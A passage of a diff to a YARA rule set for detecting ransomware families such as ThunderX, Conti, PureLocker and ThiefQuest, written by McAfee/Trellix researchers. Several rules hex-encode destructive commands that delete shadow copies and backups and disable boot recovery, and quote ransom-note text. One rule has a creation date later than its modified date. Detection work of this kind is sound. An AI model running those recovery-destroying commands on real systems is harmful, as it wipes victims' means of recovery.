-		$api10 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 22 29 5d }
-		$artifact0 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 22 29 5d }
-		$artifact1 = { 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 50 74 72 54 6f 53 74 72 75 63 74 75 72 65 }
-		$artifact2 = { 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 52 65 61 64 49 6e 74 31 36 }
-		$artifact3 = { 65 6e 76 3a 57 49 4e 44 49 52 5c 73 79 73 77 6f 77 36 34 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 76 31 2e 30 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 65 78 65 63 20 62 79 70 61 73 73}
-		$artifact4 = { 65 6e 76 3a 57 49 4e 44 49 52 5c 73 79 73 77 6f 77 36 34 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 76 31 2e 30 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 65 78 65 63 20 62 79 70 61 73 73 20 2d 66 69 6c 65}
-		$artifact5 = {5b 50 61 72 61 6d 65 74 65 72 28 50 6f 73 69 74 69 6f 6e 20 3d 20 30 20 2c 20 4d 61 6e 64 61 74 6f 72 79}
-		$artifact6 = {5b 50 61 72 61 6d 65 74 65 72 28 50 6f 73 69 74 69 6f 6e 20 3d 20 31 20 2c 20 4d 61 6e 64 61 74 6f 72 79}
-		$artifact7 = {2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 50 61 73 73 20 2d 4e 6f 4c 6f 67 6f 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 4e 6f 45 78 69 74}
-		$artifact8 = {72 65 74 75 72 6e 20 5b 42 69 74 43 6f 6e 76 65 72 74 65 72 5d 3a 3a 54 6f 49 6e 74 36 34}
+		$string0 = "2.0.1.7" wide
+		$string1 = "    <security>"
+		$string2 = "Romantic"
+		$string3 = "ProductVersion" wide
+		$string4 = "9%9R9f9q9"
+		$string5 = "IDR_VERSION1" wide
+		$string6 = "button"
+		$string7 = "    </security>"
+		$string8 = "VFileInfo" wide
+		$string9 = "LookFor" wide
+		$string10 = "      </requestedPrivileges>"
+		$string11 = " uiAccess"
+		$string12 = "  <trustInfo xmlns"
+		$string13 = "last.inf"
+		$string14 = " manifestVersion"
+		$string15 = "FFFF04E3" wide
+		$string16 = "3,31363H3P3m3u3z3"
 
 	condition:
-		6 of ( $api* ) or ( ( 3 of ( $artifact* ) ) )
+		12 of ( $string* )
 }
-rule TRELLIX_ARC_Jeff_Dev_Ransomware : RANSOMWARE FILE
+
+rule TRELLIX_ARC_Ransom_Tunderx : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Jeff Dev Ransomware"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "dd5e24f4-a2d8-5db5-9e7e-7f8bded5d401"
-		date = "2018-08-26"
-		modified = "2020-08-14"
-		reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_jeff_dev.yar#L1-L28"
+		description = "Rule to detect tthe ThunderX ransomware family"
+		author = "McAfee ATR team"
+		id = "cf5ecd0c-db26-5fe4-a056-b5c1ca3b1d34"
+		date = "2020-09-14"
+		modified = "2020-10-12"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_ThunderX.yar#L3-L45"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "386d4617046790f7f1fcf37505be4ffe51d165ba7cbd42324aed723288ca7e0a"
-		logic_hash = "58a408f4e1781540e4abdb87b85b94c1f0ea49b40bf241d6d074bc2162ac2032"
+		logic_hash = "f870616c4a35239a01129daad5f12469b2df39251ee4bc9fbeb5523f00231ece"
 		score = 75
-		quality = 45
+		quality = 68
 		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
 		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Jeff"
+		malware_family = "Ransomware:W32/ThunderX"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "7bab5dedef124803668580a59b6bf3c53cc31150d19591567397bbc131b9ccb6"
+		hash2 = "0fbfdb8340108fafaca4c5ff4d3c9f9a2296efeb9ae89fcd9210e3d4c7239666"
+		hash3 = "7527459500109b3bb48665236c5c5cb2ec71ba789867ad2b6417b38b9a46615e"
 
 	strings:
-		$s1 = "C:\\Users\\Umut\\Desktop\\takemeon" fullword wide
-		$s2 = "C:\\Users\\Umut\\Desktop\\" fullword ascii
-		$s3 = "PRESS HERE TO STOP THIS CREEPY SOUND AND VIEW WHAT HAPPENED TO YOUR COMPUTER" fullword wide
-		$s4 = "WHAT YOU DO TO MY COMPUTER??!??!!!" fullword wide
+		$pattern1 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573"
+		$s3 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii
+		$s4 = "626364656469742E657865202F736574207B64656661756C747D207265636F76657279656E61626C6564204E6F" ascii
+		$s5 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii
+		$s6 = "433A5C50726F6772616D2046696C65732028783836295C4D6963726F736F66742053514C20536572766572" ascii
+		$s7 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" ascii
+		$s8 = "433A5C50726F6772616D2046696C65735C4D6963726F736F66742053514C20536572766572" ascii
+		$s9 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii
+		$s10 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii
+		$s11 = "534F4654574152455C4D6963726F736F66745C45524944" ascii
+		$s12 = "AppPolicyGetProcessTerminationMethod" fullword ascii
+		$s13 = "7B5041545445524E5F49447D" ascii
+		$s14 = "726561646D652E747874" ascii
+		$s15 = "226E6574776F726B223A22" ascii
+		$s16 = "227375626964223A22" ascii
+		$s17 = "226C616E67223A22" ascii
+		$s18 = "22657874223A22" ascii
+		$s19 = "69642E6B6579" ascii
+		$s20 = "7B5549447D" ascii
+		$seq0 = { eb 34 66 0f 12 0d 10 c4 41 00 f2 0f 59 c1 ba cc }
+		$seq1 = { 6a 07 50 e8 51 ff ff ff 8d 86 d0 }
+		$seq2 = { ff 15 34 81 41 00 eb 15 83 f8 fc 75 10 8b 45 f4 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB ) and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "ea7e408cd2a264fd13492973e97d8d70" and $pattern1 and 4 of them ) and all of ( $seq* ) or ( all of them )
 }
 rule TRELLIX_ARC_RANSOM_Darkside : RANSOMWARE FILE
 {
@@ -142897,152 +142738,386 @@ rule TRELLIX_ARC_RANSOM_Darkside_DLL_May2021 : RANSOM FILE
 	condition:
 		filesize >= 45KB and filesize <= 70KB and all of ( $s* ) and 4 of ( $pattern* )
 }
-rule TRELLIX_ARC_Crime_Ransomware_Windows_Gpgqwerty : RANSOMWARE
+rule TRELLIX_ARC_Purelocker_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Detect GPGQwerty ransomware"
-		author = "McAfee Labs"
-		id = "dcbaf3bd-7d0c-5449-a751-82caaad3b5c2"
-		date = "2018-03-21"
+		description = "Rule to detect PureLocker ransomware based on binary sequences"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "3d945869-9faa-59de-add6-d664a7beef6f"
+		date = "2019-11-13"
 		modified = "2020-08-14"
-		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/ransomware-takes-open-source-path-encrypts-gnu-privacy-guard/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_GPGQwerty.yar#L1-L26"
+		reference = "https://www.pandasecurity.com/mediacenter/security/purelocker-ransomware-servers/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_PureLocker.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "8e77895cb8e7f33707c5080780a49cb4bf1d35aa7a8df829fdc7a93319ce3897"
+		logic_hash = "9f39f0ef922023a79919f5b41a7acda6c08373af8f5fd2d4c4dcaca6146970ea"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
 		malware_type = "ransomware"
-		malware_family = "Ransom:W32/GPGQwerty"
+		malware_family = "Ransom:W32/PureLocker"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$a = "gpg.exe –recipient qwerty  -o"
-		$b = "%s%s.%d.qwerty"
-		$c = "del /Q /F /S %s$recycle.bin"
-		$d = "cryz1@protonmail.com"
+		$sequence = { 31??FF????E8????????83????5BC2????555357BA????????83????C7????????????4A75??E8????????8B????????????8D????E8????????8B????????????8D??????E8????????FF????8D??????????59E8????????75??FF??????8D??????????59E8????????75??EB??B8????????EB??31??21??74??31??0FBE??E9????????8D??????C7????????????C7????????????66??????????FF??????E8????????89??????52E8????????5A5052E8????????5A50FF??????E8????????8D????????????50E8????????8B??????01??89??????8B??????83????53E8????????89??????8B??????21??75??31??0FBE??E9????????68????????68????????FF????????????FF??????E8????????FF????E8????????89??01??89????????????8B????????????83????53E8????????89????????????8B????????????21??75??FF??????E8????????31??0FBE??E9????????68????????68????????FF??????FF????????????E8????????0FBE??????????83????0F85????????8B??????83????53E8????????89????????????8B????????????21??75??E9????????68????????68????????FF??????FF????????????E8????????FF??????E8????????68????????8D??????508D??????5068????????68????????68????????31??5068????????68????????FF????????????FF????????????68????????E8????????89??????8B??????21??75??31??0FBE??E9????????8D??????FF????E8????????8D??????FF????E8????????FF????????????E8????????FF????????????E8????????B8????????0FBE??E9????????EB??68????????8D??????508D??????5068????????68????????68????????31??5068????????68????????FF??????FF????????????68????????E8????????89??????8B??????21??75??31??0FBE??E9????????8D??????508D??????FF????E8????????89????????????FF??????E8????????C7??????????????FF????????????E8????????C7????????????????????C7????????????????????8B????????????21??74??E9????????0FBE????????????83????75??68????????68????????8D????????????5068????????8D??????FF????E8????????89??????EB??68????????68????????8D????????????5068????????8D??????FF????E8????????89??????8B??????21??74??E9????????0FBE????????????83????75??8D????????????8D????FF????FF??8F??????8F??????EB??8D????????????8B????9952508F??????8F??????FF??????FF??????5B5F83????7F??7C??83????77??31??EB??B8????????09??75??E9????????0FBE????????????83????75??68????????E8????????89????????????8B????????????21??75??E9????????68????????68????????68????????FF????????????FF????????????FF????????????8D??????FF????E8????????89????????????EB??68????????E8????????89??????8B??????21??75??E9????????68????????68????????FF??????8B????????????508D??????FF????E8????????89????????????8B????????????21??74??E9????????0FBE????????????83????75??8B????????????21??75??E9????????8B????????????8D????FF????FF??5B5F83????75??83????74??31??EB??B8????????09??74??E9????????EB??8B??????21??75??E9????????8B??????8B????21??75??E9????????0FBE????????????83????75??C7????????????????????FF????????????E8????????89????????????C7????????????????????68????????68????????FF????????????FF????????????8B????????????8D????FF????FF??8D??????FF????E8????????89????????????EB??C7????????????????????FF????????????E8????????89????????????C7????????????????????68????????FF????????????FF????????????8B????????????FF????8D??????FF????E8????????89????????????8B????????????21??74??E9????????0FBE????????????83????75??8B????????????21??7E??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????EB??8B??????21??7E??68????????68????????FF??????E8????????FF??????E8????????C7??????????????0FBE????????????83????75??8B????????????21??75??E9????????8B????????????8D????89??21??75??E9????????EB??8B????????????21??75??E9????????8B????????????8D????89??21??75??E9????????8B??????83????53E8????????89????????????8B????????????21??75??E9????????68????????68????????FF??????FF????????????E8????????0FBE????????????83????75??68????????68????????FF??????FF????????????8B????????????8D????FF????FF??8D??????FF????E8????????89????????????EB??68????????FF??????FF????????????8B????????????FF????8D??????FF????E8????????89????????????FF????????????E8????????C7????????????????????0FBE????????????83????75??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????EB??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????8B????????????21??74??EB??68????????8D??????FF????E8????????89????????????8B????????????21??74??EB??0FBE????????????83????75??68????????31??508D??????FF????E8????????C6????????8D??????FF????E8????????8D??????FF????E8????????0FBE??????0FBE??E9????????8B????????????21??7E??FF????????????E8????????8B????????????21??7E??FF????????????E8????????8B????????????21??7E??FF????????????E8????????8B??????21??7E??FF??????E8????????8B????????????21??7E??FF????????????E8????????8D??????8B????21??7E??68????????8D??????FF????E8????????8D??????8B????21??7E??8D??????FF????E8????????8D??????8B????21??7E??8D??????FF????E8????????31??0FBE??EB??31??FF????E8????????FF????????????E8????????FF??????E8????????81??????????5F5B5DC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????31??C2????5553BA????????83????C7????????????4A75??E8????????8B??????8D????E8????????83????????????0F84????????FF????E8????????89??01??89??????8B??????83????53E8????????89??????83????????74??68????????68????????FF??????FF??????E8????????89??3B??????75??8B??????83????538D??????5866??????FF??????5866??????FF??????5889????FF??????????5889??????8D??????508D??????5068????????68????????FF??????89??21??75??FF??????5889??????FF??????E8????????8B??????EB??31??FF????E8????????83????5B5DC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????31??5050E8????????FF??????E8????????52E8????????5A50FF??????????8D??????????50E8????????8D??????50E8????????52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????8D??????50E8????????FF????8D??????????59E8????????74??52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????588B??????52E8????????8D??????50E8????????EB??8B????52E8????????5A5052E8????????8B??????52E8????????8D??????50E8????????8B????52E8????????5A5052E8????????5850E8????????5A01??EB??E8????????66????????FF????E8????????FF??????E8????????83????C331??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????555331??50505050E8????????C7??????????????FF??????E8????????89????8B????21??75??31??EB??8D??????50FF??????FF??????68????????E8????????89??21??75??8B????FF????5889??????68????????68????????FF??????E8????????FF????E8????????8B??????EB??31??83????5B5DC35331??50505050E8????????8B??????8D????E8????????FF????E8????????89??????8B??????83????53E8????????89??????83????????74??68????????FF??????FF??????FF??????E8????????21??74??FF??????FF??????68????????E8????????89??F7??89??????FF??????E8????????8B??????EB??31??FF????E8????????83????5BC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????5553BA????????83????C7????????????4A75??E8????????8B??????8D????E8????????FF????8D??????????59E8????????74??31??E9????????52E8????????5A50FF??????????8D??????????50E8????????8B??????52E8????????8D??????50E8????????FF??????E8????????89??01??89??????8B??????83????53E8????????89??????83????????0F84????????68????????68????????FF??????FF??????E8????????89??3B??????0F85????????FF??????8D??????5866??????8B??????83????535866??????FF??????5889????C7??????????????8D??????????8D??????E8????????8D??????C7????????????C7????????????8D??????505889????68????????68????????8D??????508D??????5068????????8D??????50E8????????89??21??75??8B??????21??7E??B8????????EB??31??21??74??FF??????E8????????C7??????????????68????????68????????8D??????508D??????50FF??????E8????????89??21??75??8D??????FF????5889??????FF??????E8????????8B??????21??7E??FF??????E8????????8B??????EB??31??FF??????E8????????FF????E8????????83????5B5DC2????555357BA????????83????C7???????????? }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule TRELLIX_ARC_Cryptolocker_Set1 : RANSOMWARE
+rule TRELLIX_ARC_MALW_Thiefquest : KEYLOGGER BACKDOOR RANSOMWARE FILE
 {
 	meta:
-		description = "Detection of Cryptolocker Samples"
-		author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
-		id = "13ccc6d3-c2cc-59ac-81af-ec11fb78cd41"
-		date = "2014-04-13"
+		description = "Rule to detect the Evilquest/ThiefQuest malware"
+		author = "McAfee ATR Team"
+		id = "09b074f7-6899-574d-a7d6-4414509aaa78"
+		date = "2020-07-09"
+		modified = "2020-10-12"
+		reference = "https://www.bleepingcomputer.com/news/security/thiefquest-ransomware-is-a-file-stealing-mac-wiper-in-disguise/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_thiefquest.yar#L1-L46"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "5a024ffabefa6082031dccdb1e74a7fec9f60f257cd0b1ab0f698ba2a5baca6b"
+		logic_hash = "d40a466b12188d545d3fbe2c9d7e3685dde1250ae1f25df2a72cdf93c470ae25"
+		score = 75
+		quality = 68
+		tags = "KEYLOGGER, BACKDOOR, RANSOMWARE, FILE"
+		rule_version = "v1"
+		malware_type = "keylogger, backdoor, ransomware"
+		actor_type = "Cybercrime"
+		malware_family = "Ransom:OSX/ThiefQuest"
+
+	strings:
+		$pattern_0 = { 01c1 48 83c102 48 }
+		$pattern_1 = { 8c1471 80c1c1 98 1c8c }
+		$pattern_2 = { d8974f0dc89a 9f c9 9adf70cd595390 }
+		$pattern_3 = { d897c56f028c 2393a0a42e92 8ea2c27affc2 f8 }
+		$pattern_4 = { 477006 baa6a1cb82 ae f9 e8???????? d8a32bd0d519 }
+		$pattern_5 = { d898ab5c757b 2f f26f 5d }
+		$pattern_6 = { bc007a846b 2b54adaf 93 35eddf38e6 cdd0 b246 }
+		$pattern_7 = { ae 49b00e 01d1 45da611b 44839db656691674 }
+		$pattern_8 = { 01c1 48 83c101 48 }
+		$pattern_9 = { 6be3c6 5c 99 ae ed bf370e2f47 }
+		$pattern_10 = { fd d7 43bd18fd6f06 7937 fa }
+		$pattern_11 = { 01c2 48 83c201 bf01000000 }
+		$pattern_12 = { d89825ed4469 29f1 5c e12d }
+		$pattern_13 = { d8992062f7f9 73ff 90 085fc6 }
+		$pattern_14 = { 01c1 6689ca 668995cefeffff e9???????? }
+		$pattern_15 = { 01c1 41 89c8 44 }
+		$pattern_16 = { d89935c487a7 bcdffa587c be6cadbb3c 185fc4 }
+		$pattern_17 = { 01c1 48 8b75a8 48 }
+		$pattern_18 = { 0000 48 8945f8 e9???????? }
+		$pattern_19 = { d89959d6472d a2???????? 3525c7eec9 95 }
+		$pattern_20 = { 01c2 48 83c203 bf01000000 }
+		$pattern_21 = { 4a7888 ab 23e7 cf 11f3 }
+		$pattern_22 = { d8982fbf222d 49 92 1d25b42bba }
+		$pattern_23 = { e2d7 8437 6b4696d9 92 9d a6 }
+
+	condition:
+		7 of them and filesize < 124322606
+}
+rule TRELLIX_ARC_Cryptonar_Ransomware : RANSOMWARE FILE
+{
+	meta:
+		description = "Rule to detect CryptoNar Ransomware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "0911250f-fc1f-58bc-ac09-d77d2a2ed3ce"
+		date = "2025-06-01"
+		modified = "2020-08-14"
+		reference = "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_CryptoNar.yar#L1-L36"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "04c1c4f45ad3552aa0876c3b645c6ca92493018f7fdc5d9d9ed26cf67199d21b"
+		score = 75
+		quality = 70
+		tags = "RANSOMWARE, FILE"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/CryptoNar"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
+
+	strings:
+		$s1 = "C:\\narnar\\CryptoNar\\CryptoNarDecryptor\\obj\\Debug\\CryptoNar.pdb" fullword ascii
+		$s2 = "CryptoNarDecryptor.exe" fullword wide
+		$s3 = "server will eliminate the key after 72 hours since its generation (since the moment your computer was infected). Once this has " fullword ascii
+		$s4 = "Do not delete this file, else the decryption process will be broken" fullword wide
+		$s5 = "key you received, and wait until the decryption process is done." fullword ascii
+		$s6 = "In order to receive your decryption key, you will have to pay $200 in bitcoins to this bitcoin address: [bitcoin address]" fullword ascii
+		$s7 = "Decryption process failed" fullword wide
+		$s8 = "CryptoNarDecryptor.KeyValidationWindow.resources" fullword ascii
+		$s9 = "Important note: Removing CryptoNar will not restore access to your encrypted files." fullword ascii
+		$s10 = "johnsmith987654@tutanota.com" fullword wide
+		$s11 = "Decryption process will start soon" fullword wide
+		$s12 = "CryptoNarDecryptor.DecryptionProgressBarForm.resources" fullword ascii
+		$s13 = "DecryptionProcessProgressBar" fullword wide
+		$s14 = "CryptoNarDecryptor.Properties.Resources.resources" fullword ascii
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB ) and all of them
+}
+
+rule TRELLIX_ARC_Ransom_Conti : RANSOMWARE FILE
+{
+	meta:
+		description = "Conti ransomware is havnig capability too scan and encrypt oover the network"
+		author = "McAfee ATR team"
+		id = "8fc6943d-fb99-5957-929b-4c264d9fba2d"
+		date = "2020-07-09"
+		modified = "2020-10-12"
+		reference = "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Conti.yar#L3-L37"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe"
+		logic_hash = "953471c130309bbc712197d49d2072bd45838f49d2b25f86273a15c6baa87354"
+		score = 75
+		quality = 70
+		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Conti"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
+
+	strings:
+		$string1 = "HOW_TO_DECRYPTP" fullword ascii
+		$string2 = "The system is LOCKED." fullword ascii
+		$string3 = "The network is LOCKED." fullword ascii
+		$code1 = { ff b4 b5 48 ff ff ff 53 ff 15 bc b0 41 00 85 c0 }
+		$code2 = { 6a 02 6a 00 6a ff 68 ec fd ff ff ff 76 0c ff 15 }
+		$code3 = { 56 8d 85 38 ff ff ff 50 ff d7 85 c0 0f 84 f2 01 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.number_of_sections == 5 and ( pe.imphash ( ) == "30fe3f044289487cddc09bfb16ee1fde" or ( all of them and all of ( $code* ) ) )
+}
+rule TRELLIX_ARC_Screenlocker_Acroware : RANSOMWARE FILE
+{
+	meta:
+		description = "Rule to detect the ScreenLocker Acroware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "76eb69eb-dfe7-5629-bf2d-d20574efd662"
+		date = "2018-08-28"
 		modified = "2020-08-14"
+		reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_acroware.yar#L1-L29"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "f9efcfc5328e6502cbbbff752a940ac221e437d8732052fc265618f6a6ad72ae"
+		logic_hash = "582f3544cf1f8066b1e9ac04c3a4cc9f0ba96804ca53bc3746b433df9c33e0a1"
+		score = 75
+		quality = 70
+		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Acroware"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
+
+	strings:
+		$s1 = "C:\\Users\\patri\\Documents\\Visual Studio 2015\\Projects\\Advanced Ransi\\Advanced Ransi\\obj\\Debug\\Advanced Ransi.pdb" fullword ascii
+		$s2 = "All your Personal Data got encrypted and the decryption key is stored on a hidden" fullword ascii
+		$s3 = "alphaoil@mail2tor.com any try of removing this Ransomware will result in an instantly " fullword ascii
+		$s4 = "HKEY_CURRENT_USER\\SoftwareE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
+		$s5 = "webserver, after 72 hours thedecryption key will get removed and your personal" fullword ascii
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB ) and all of them
+}
+rule TRELLIX_ARC_RANSOM_Wastedlocker : RANSOMWARE FILE
+{
+	meta:
+		description = "Rule to detect unpacked samples of WastedLocker"
+		author = "McAfee ATR Team"
+		id = "900923cf-75c0-5342-858d-fe1ffa9486bd"
+		date = "2020-07-27"
+		modified = "2020-10-12"
 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Cryptolocker.yar#L1-L40"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_wastedlocker.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "5be8d077537a59d860a972392be186d2697e55778f750d03b0fd3b0a73f714d9"
+		logic_hash = "c5adf88a46c34c8683d0e3d70529b352c77209f004e6c638ff079ea025921781"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
 		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Cryptolocker"
+		malware_family = "Ransom:W32/WastedLocker"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "ae255679f487e2e9075ffd5e8c7836dd425229c1e3bd40cfc46fbbceceec7cf4"
 
 	strings:
-		$string0 = "static"
-		$string1 = " kscdS"
-		$string2 = "Romantic"
-		$string3 = "CompanyName" wide
-		$string4 = "ProductVersion" wide
-		$string5 = "9%9R9f9q9"
-		$string6 = "IDR_VERSION1" wide
-		$string7 = "  </trustInfo>"
-		$string8 = "LookFor" wide
-		$string9 = ":n;t;y;"
-		$string10 = "        <requestedExecutionLevel level"
-		$string11 = "VS_VERSION_INFO" wide
-		$string12 = "2.0.1.0" wide
-		$string13 = "<assembly xmlns"
-		$string14 = "  <trustInfo xmlns"
-		$string15 = "srtWd@@"
-		$string16 = "515]5z5"
-		$string17 = "C:\\lZbvnoVe.exe" wide
+		$pattern_0 = { 8d45fc 50 53 53 6a19 ff75f8 }
+		$pattern_1 = { 66833b00 8bf3 0f8485000000 8b7d10 8b472c 85c0 7410 }
+		$pattern_2 = { e8???????? 8b4d08 8b4518 8d0441 6683600200 83c40c 837d1400 }
+		$pattern_3 = { 8701 e9???????? 8bc7 5f 5e 5b }
+		$pattern_4 = { 8bf8 3bfb 742f 53 8d45fc 50 56 }
+		$pattern_5 = { 6a10 8d45f0 6a00 50 e8???????? 83c40c 5e }
+		$pattern_6 = { 5f 5d c20800 55 8bec }
+		$pattern_7 = { 8d7e04 ff15???????? 85c0 8945e8 740e 2b4510 }
+		$pattern_8 = { ff15???????? 8b45dc 8b4dbc 69c00d661900 055ff36e3c 8945dc }
+		$pattern_9 = { 8b4d08 8b19 03d8 f7d0 c1c60f 03f2 0bc6 }
+
+	condition:
+		7 of them and filesize < 1806288
+}
+rule TRELLIX_ARC_Ransom_Maze : RANSOMWARE FILE
+{
+	meta:
+		description = "Detecting MAZE Ransomware"
+		author = "McAfee ATR"
+		id = "098a93c4-9aab-5563-af17-7aa91b056f64"
+		date = "2020-04-19"
+		modified = "2020-10-12"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Maze.yar#L1-L39"
